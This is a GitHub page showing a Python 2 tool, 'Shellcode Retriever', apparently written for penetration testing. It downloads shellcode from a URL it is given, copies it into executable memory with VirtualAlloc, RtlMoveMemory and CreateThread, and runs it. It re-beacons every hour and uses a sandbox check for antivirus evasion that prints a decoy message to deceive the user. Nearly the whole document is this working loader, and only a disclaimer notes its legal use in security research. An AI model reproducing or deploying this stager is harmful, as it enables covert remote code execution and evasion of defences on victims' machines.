-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshellcode_retriever.py
120 lines (94 loc) · 3.41 KB
/
shellcode_retriever.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/usr/bin/env python
'''
Shellcode Retriever
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import socket
import sys
import urllib2
import ctypes
import time
import signal
#Set to True if you want to beacon every X seconds based
#on timesleep
retry = True
#time to sleep in seconds
timesleep = 3600
opener = urllib2.build_opener()
def sandbox_check():
"""
Quick sandbox check for additional av evasion.
And a message to throw the user off.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sandbox = True
try:
s.connect(('127.0.0.1', 445))
s.close()
sandbox = False
except:
pass
if sandbox == True:
try:
s.connect(('127.0.0.1', 135))
s.close()
except:
#Message to throw the user off:
print "Clybase platform checker 2012\nYour platform is:", sys.platform
sys.exit(0)
def allocate_exe(shellcode):
"""
ctypes VritualAlloc, MoveMem, and CreateThread
From http://www.debasish.in/2012_04_01_archive.html
"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def get_and_execute(openurl):
info = opener.open(openurl)
shellcode = info.read()
shellcode = bytearray(shellcode)
allocate_exe(shellcode)
def main():
sandbox_check()
#set a url below or leave as '' to manually enter
openurl = ''
if openurl == '':
openurl = raw_input("Give me a url: ")
try:
get_and_execute(openurl)
while retry is True:
time.sleep(timesleep)
get_and_execute(openurl)
except Exception, e:
#print str(e)
pass
if __name__ == "__main__":
main()